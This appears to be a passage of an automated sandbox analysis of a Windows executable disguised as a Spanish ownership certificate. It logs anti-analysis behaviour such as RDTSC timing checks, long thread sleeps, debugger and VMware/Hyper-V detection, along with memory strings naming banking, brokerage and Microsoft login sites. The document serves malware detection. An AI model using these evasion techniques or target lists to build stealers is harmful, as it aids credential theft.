          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeRDTSC instruction interceptor: First address: 1C65242 second address: 1C65242 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, FFFFFF8Fh 0x00000005 cmp ebx, ecx 0x00000007 jc 00007FDE6D3D4252h 0x00000009 test bx, dx 0x0000000c inc ebp 0x0000000d test ecx, ebx 0x0000000f inc ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeMemory allocated: 37070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeMemory allocated: 39070000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599874Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599655Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599546Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598999Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598343Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598124Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597796Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597577Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597468Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597324Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597211Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597035Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596889Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596734Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596624Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596515Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596405Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596295Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596187Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596077Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595968Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595858Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595743Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595639Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595530Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595421Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595312Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595202Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595093Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594874Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594655Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594546Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594379Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594243Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594104Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 593923Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeWindow / User API: threadDelayed 2015Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeWindow / User API: threadDelayed 7818Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspD212.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeAPI coverage: 1.7 %
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599874s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6816Thread sleep count: 2015 > 30Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6816Thread sleep count: 7818 > 30Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599655s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599546s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599218s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598999s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598890s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598671s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598343s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598124s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597796s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597577s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597468s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597324s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597211s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -597035s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596889s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596734s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596624s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596515s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596295s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596187s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -596077s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595968s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595858s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595743s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595639s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595530s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595421s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595312s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595202s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -595093s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594984s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594874s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594765s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594655s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594546s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594379s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594243s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -594104s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe TID: 6904Thread sleep time: -593923s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_0040687E FindFirstFileW,FindClose,4_2_0040687E
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_00402910 FindFirstFileW,4_2_00402910
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 4_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C2D
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599874Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599765Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599655Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599546Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599218Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598999Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598890Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598671Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598343Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598124Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597796Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597577Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597468Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597324Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597211Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 597035Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596889Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596734Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596624Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596515Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596405Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596295Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596187Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 596077Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595968Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595858Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595743Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595639Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595530Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595421Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595312Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595202Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 595093Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594874Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594655Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594546Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594379Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594243Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 594104Jump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeThread delayed: delay time: 593923Jump to behavior
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3379964437.0000000006B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
          Source: CERTIFICADO TITULARIDAD.exe, 00000004.00000002.3401985362.0000000038325000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeAPI call chain: ExitProcess graph end nodegraph_0-5313
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeAPI call chain: ExitProcess graph end nodegraph_0-5316
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_73F727A4 LdrInitializeThunk,VirtualAlloc,0_2_73F727A4
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeCode function: 0_2_73F71BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73F71BFF
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exeProcess created: C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe "C:\Users\user\Desktop\CERTIFICADO TITULARIDAD.exe"Jump to behavior
